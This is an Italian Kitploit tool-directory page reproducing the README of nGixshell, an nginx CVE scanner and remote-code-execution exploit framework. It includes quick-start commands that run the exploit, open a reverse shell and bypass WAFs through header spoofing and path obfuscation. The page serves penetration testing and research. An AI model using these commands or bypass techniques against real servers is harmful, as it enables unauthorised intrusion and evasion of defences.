Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nGixshell — scanner CVE per nginx + framework di exploit RCE (CVE-2026-42945 + altre 16) | Kitploit
Strumenti/GitHubGitHub/mateusverass/ngixshell
RicognizioneScanner di VulnerabilitàFramework di ExploitSfruttamento di Applicazioni WebBypass WAFSicurezza WebPenetration TestingCommand and ControlEnumerazione SottodominiRed TeamingSviluppo Payload
218323 giorni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubmateusverass/ngixshell

nGixshell

scanner CVE per nginx + framework di exploit RCE (CVE-2026-42945 + altre 16)

Vedi Repository
Condividi
nGixShell

Python CVEs Zero deps License


nGixShell è un framework di scansione CVE e sfruttamento RCE per nginx. Include un proof-of-concept per CVE-2026-42945 (CVSS 3.1 8.1 HIGH secondo F5/NVD) — un heap buffer overflow in ngx_http_rewrite_module — e uno scanner che copre 64 CVE di nginx con probe HTTP automatizzati, fingerprinting, rilevamento/bypass di WAF, auditing della sicurezza web e generazione di report.

Zero dipendenze esterne. Solo stdlib di Python 3.

Prerequisiti dell'exploit (leggere prima). --cmd / --shell funzionano solo quando tutte queste condizioni sono vere: il target è x86_64, la configurazione vulnerabile rewrite+set è presente, ASLR è disabilitato, e gli indirizzi heap/libc sono stati calibrati per quella specifica build (calibrate.py → --build-file). Vedi Requisiti dell'exploit. Lo scanner stesso non ha tali requisiti.


Avvio rapido

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Nessun flag richiesto — puntare lo strumento verso un target esegue tutto automaticamente.
TLS è rilevato automaticamente. nginx viene identificato anche con server_tokens off.

system() non cattura stdout: --cmd 'id' viene eseguito ma non restituisce nulla. Usa un comando con un effetto collaterale osservabile e confermalo con --verify-url http://target/pwned (HTTP 200 = confermato).


Utilizzo

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modalità

FlagDescrizione
(nessuno)Auto — fingerprint + scansione CVE + audit web
--cmd 'CMD'Esegue un comando tramite RCE CVE-2026-42945
--cmd-file FILEEsegue comandi da file (uniti con ;)
--shellApre una reverse shell
--shell-type TYPEPayload: bash python perl php nc powershell (predefinito: python)
--upgrade-shellInvia automaticamente l'upgrade PTY dopo la connessione della shell
--verify-url URLDopo un crash rilevato, recupera l'URL per confermare l'esecuzione del comando (200 = verificato)
--subdomain-scan DOMAINTrova nginx vulnerabile sui sottodomini
--cve CVE-IDTesta una CVE specifica
--list-cvesStampa tutte le 64 CVE con CVSS e info sui probe
--list-candidatesStampa i candidati di indirizzo heap
--dry-runSolo fingerprint + scansione, nessun exploit
--target-file FILEScansiona più host da un file

Ottimizzazione dell'exploit

FlagDescrizione
--build-file FILEConsigliato. Profilo di calibrazione JSON da calibrate.py --json -o FILE
--offsets SPECOffset heap esadecimali separati da virgola da calibrate.py (es. 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEXOverride manuali degli indirizzi
--build KEYProfilo integrato (solo il riferimento al lab DepthFirst è incluso)
--rewrite-path PATHLocation rewrite vulnerabile (predefinito /api)
--spray-path PATHLocation supportata da proxy_pass usata per lo spray del body POST (predefinito /upload; il lab incluso usa /spray)
--spray-mode partial|fullpartial: body corto + Content-Length grande (lab incluso); full: body completo + X-Delay (lab DepthFirst)
--pad-a N / --pad-plus NPadding del percorso di trigger prima della sequenza + (predefiniti 349 / 969, dal PoC del vendor)
--continue-on-crashContinua a provare i restanti candidati heap dopo un crash non verificato
--tries N / --spray N / --body-len NTentativi di trigger per candidato / connessioni di spray / dimensione del body di spray

Rilevamento e bypass del WAF

FlagDescrizione
--waf-detectRileva il WAF prima della scansione
--waf-bypassAbilita tutte le tecniche di bypass (esegue anche il rilevamento)
--waf-ip IPFalsifica questo IP negli header di bypass (predefinito: RFC1918 casuale)

Tecniche di bypass (tutte attive quando --waf-bypass è impostato):

TecnicaDettaglio
IP spoofingX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
Rotazione UA11 User-Agent reali di browser/bot, randomizzati per richiesta
Offuscamento del percorsodoppio slash, padding /./, percent-encoding, variazione di maiuscole/minuscole
Rimescolamento maiuscole headerrandomizza il casing dei nomi degli header per rompere il pattern matching del WAF

WAF rilevati: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Audit web

Viene eseguito automaticamente in modalità scansione. Tutti i moduli possono essere saltati singolarmente.

FlagDescrizione
--skip-headersSalta l'audit degli header di sicurezza HTTP
--skip-pathsSalta la scoperta di percorsi/file
--skip-vhostsSalta l'enumerazione degli virtual host
--skip-tlsSalta l'audit del protocollo TLS
--path-wordlist FILEPercorsi aggiuntivi da sondare (uno per riga)
  • Audit degli header — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, header che rivelano la versione
  • Scoperta dei percorsi — oltre 50 percorsi; un probe sentinella elimina i falsi positivi da regole catch-all 403/301
  • Enumerazione degli virtual host — richiede differenze sia di stato che di body per evitare falsi positivi da default-block
  • Audit TLS — testa il supporto TLS 1.0–1.3, la scadenza del certificato e il rilevamento di self-signed
  • stub_status — analizza le metriche delle connessioni attive da /nginx_status se esposto

Connessione

FlagDescrizione
--port PORTSovrascrive la porta
--tlsForza TLS (rilevato automaticamente per impostazione predefinita)
--proxy URLProxy: http://, https://, socks5://

HTTP

FlagDescrizione
--user-agent UAUser-Agent personalizzato
--auth USER:PASSAutenticazione HTTP Basic
--cookie VALUEHeader Cookie
--header NAME:VALUEHeader aggiuntivo (ripetibile)

Rate / Timing

Scarica lo strumento